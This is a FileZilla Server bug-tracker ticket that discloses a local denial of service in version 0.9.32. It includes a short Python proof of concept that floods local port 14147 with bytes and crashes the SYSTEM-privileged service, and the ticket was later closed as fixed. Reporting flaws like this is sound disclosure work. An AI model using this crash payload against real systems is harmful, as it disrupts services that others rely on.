Opened 14 years ago
Closed 11 years ago
#4693 closed Bug report (fixed)
FileZilla Server version 0.9.32 local denial of service
|Reported by:||Juan Pablo Lopez Yacubian||Owned by:|
|Keywords:||crash, admin, 14147, fixed||Cc:|
|Component version:||Operating system type:||Windows|
|Operating system version:||XP SP3|
The problem is in a local port (14147) that "FileZilla Server" uses for its interface.
If you send some data to this port, which is open in "FileZilla Server Interface.exe", the process "FileZilla server.exe" crashes.
I did some tests with a debugger and I could not run code. For me it is only a denial of service, but it is important to repair it because this process runs with system privileges.
I wrote a PoC in Python for testing:
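from socket import *
host = "127.0.0.1"
port = 14147            # local port used by the server's interface
data = b"A" * 698000    # bytes literal, so send() also accepts it on Python 3
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(data)
s.close()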
OS: Windows XP SP3, all patches
Juan Pablo Lopez Yacubian
Change History (3)
by , 14 years ago
|Attachment:||FileZilla Server.7z added|
comment:1 by , 14 years ago
|Priority:||low → critical|
|Status:||new → moreinfo|
comment:2 by , 11 years ago
|Keywords:||crash admin 14147 fixed added|
|Status:||moreinfo → closed|
This is 3 years old, and a fix was released.
If this problem still occurs on current FzServer, please reopen this ticket.
Thanks for spotting this.
Please try the attached build of FileZilla Server.